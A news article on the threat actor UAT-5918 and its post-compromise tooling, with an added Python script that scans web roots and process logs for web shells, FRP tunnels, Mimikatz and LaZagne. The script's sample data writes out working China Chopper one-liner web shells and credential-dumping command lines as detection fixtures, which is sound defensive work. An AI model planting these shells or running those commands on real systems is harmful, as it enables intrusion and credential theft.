Researchers have identified a new threat actor, known as UAT-5918, which has been targeting critical infrastructure entities in Taiwan since at least 2023.
According to Cisco Talos researchers Jungsoo An, Asheer Malhotra, Brandon White, and Vitor Ventura, “UAT-5918 is a threat actor that is believed to be motivated by establishing long-term access for information theft, utilizing a combination of web shells and open-sourced tooling to conduct post-compromise activities and establish persistence in victim environments for information theft and credential harvesting.”
Additionally, the threat actor has targeted various other sectors, including information technology, telecommunications, academia, and healthcare.
UAT-5918 is assessed to be an advanced persistent threat (APT) group seeking to establish long-term persistent access in victim environments. The group’s tactics overlap with those of several Chinese hacking crews, including Volt Typhoon, Flax Typhoon, Tropic Trooper, Earth Estries, and Dalbit.
The attack chains used by UAT-5918 involve gaining initial access by exploiting N-day security vulnerabilities in unpatched web and application servers exposed to the internet. The group then drops various open-source tools to conduct network reconnaissance, system information gathering, and lateral movement.
UAT-5918’s post-exploitation tactics include the use of Fast Reverse Proxy (FRP) and Neo-reGeorg to set up reverse proxy tunnels, so that compromised endpoints inside the victim network can be reached from attacker-controlled remote hosts.
The threat actor has also been using tools such as Mimikatz, LaZagne, and a browser data extractor called BrowserDataLite to harvest credentials and gain deeper access to the target environment via RDP, WMIC, or Impacket. Additionally, UAT-5918 uses the Chopper web shell, Crowdoor, and SparrowDoor, the latter two of which have previously been used by another threat group called Earth Estries.
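The tooling named in the two paragraphs above (web shells, FRP tunnels, Mimikatz, LaZagne) leaves fairly recognisable traces on a host. The script below is an added triage example written for this page, not Cisco Talos code and not derived from the report's indicators: it scans a web root for China Chopper style one-liners and generic eval-on-request shells, flags files named the way Neo-reGeorg names its server-side tunnel pages (an assumption about that tool's default `tunnel.<ext>` naming), and checks process-creation command lines for FRP client (`frpc -c <config>`), Mimikatz (`sekurlsa::`/`privilege::debug`) and LaZagne (`lazagne all`) invocations. All files, paths and process events are constructed for the example.

```python
"""Added triage example: host-level indicators for the post-compromise
tooling described on this page. Sample web root and process events are
constructed inline so the script runs offline."""
import re
import tempfile
from pathlib import Path

WEB_EXTENSIONS = {".php", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}

# Web shell source patterns. The first three are the public China Chopper
# one-liner forms; the last catches any eval()/assert() fed straight from a
# request parameter, which also covers many Chopper variants.
WEBSHELL_PATTERNS = {
    "chopper_aspx": re.compile(r'eval\s*\(\s*Request\.Item\[', re.I),
    "chopper_php": re.compile(r'@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\[', re.I),
    "chopper_jsp": re.compile(r'Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter', re.I),
    "generic_eval_request": re.compile(
        r'\b(?:eval|assert)\s*\(.*?(?:Request\.|\$_(?:POST|GET|REQUEST)|getParameter)', re.I),
}

# Assumption: Neo-reGeorg's generator writes its server pages as tunnel.<ext>.
# A renamed page needs content analysis; this is only a cheap first pass.
TUNNEL_NAME = re.compile(r'^tunnel\.(?:php|aspx|ashx|jsp|jspx)$', re.I)

# Command-line indicators for the credential and tunnelling tools named above.
TOOL_PATTERNS = {
    "frp_client": re.compile(r'\bfrpc(?:\.exe)?\b.*?\s-c\s+\S+', re.I),
    "mimikatz": re.compile(r'(?:sekurlsa::|privilege::debug|lsadump::)', re.I),
    "lazagne": re.compile(r'\blazagne(?:\.exe)?\b\s+(?:all|browsers|windows)', re.I),
}


def scan_webroot(root):
    """Return [{'path': ..., 'rule': ...}] for every indicator hit under root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if TUNNEL_NAME.match(path.name):
            findings.append({"path": rel, "rule": "neoreg_tunnel_name"})
        if path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        text = path.read_text(errors="replace")
        for rule, pattern in WEBSHELL_PATTERNS.items():
            if pattern.search(text):
                findings.append({"path": rel, "rule": rule})
    return findings


def scan_process_events(events):
    """events: iterable of {'pid', 'image', 'cmdline'} dicts (e.g. from Sysmon ID 1).
    Returns [{'pid': ..., 'rule': ...}] for each matching command line."""
    hits = []
    for ev in events:
        for rule, pattern in TOOL_PATTERNS.items():
            if pattern.search(ev.get("cmdline", "")):
                hits.append({"pid": ev["pid"], "rule": rule})
    return hits


# Constructed sample data: one benign page, two Chopper one-liners, one
# tunnel-named page, and four process events (one benign).
def build_sample_webroot(root):
    root = Path(root)
    app = root / "app"
    app.mkdir(parents=True, exist_ok=True)
    (app / "index.aspx").write_text('<%@ Page Language="C#" %>\n<html>hello</html>\n')
    (app / "c.aspx").write_text('<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>')
    (app / "x.php").write_text("<?php @eval($_POST['pass']); ?>")
    (app / "tunnel.aspx").write_text('<%@ Page Language="C#" %><% /* constructed stand-in */ %>')
    return root


SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 5312, "image": r"C:\ProgramData\frpc.exe", "cmdline": "frpc.exe -c frpc.ini"},
    {"pid": 5388, "image": r"C:\Users\Public\m.exe",
     "cmdline": '"m.exe" "privilege::debug" "sekurlsa::logonpasswords" "exit"'},
    {"pid": 5402, "image": r"C:\Users\Public\laZagne.exe", "cmdline": "laZagne.exe all"},
]


def demo():
    """Build the sample web root in a temp dir and run both scans."""
    root = build_sample_webroot(tempfile.mkdtemp())
    return scan_webroot(root), scan_process_events(SAMPLE_EVENTS)


if __name__ == "__main__":
    web, procs = demo()
    for f in web:
        print(f"[webroot] {f['rule']:<22} {f['path']}")
    for h in procs:
        print(f"[process] {h['rule']:<22} pid={h['pid']}")
```

Point `scan_webroot` at a real document root and feed `scan_process_events` with parsed EDR or Sysmon process-creation records; the regexes are deliberately narrow so that a hit is worth a look rather than a flood of noise, and they say nothing about renamed binaries or obfuscated shells, which need content hashing or behavioural detection on top.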
BrowserDataLite is designed to steal login information, cookies, and browsing history from web browsers. The threat actor also engages in systematic data theft by enumerating local and shared drives to find data of interest.
According to the researchers, “the activity that we monitored suggests that the post-compromise activity is done manually with the main goal being information theft. This also includes the deployment of web shells across any discovered sub-domains and internet-accessible servers to open multiple points of entry to the victim organizations.”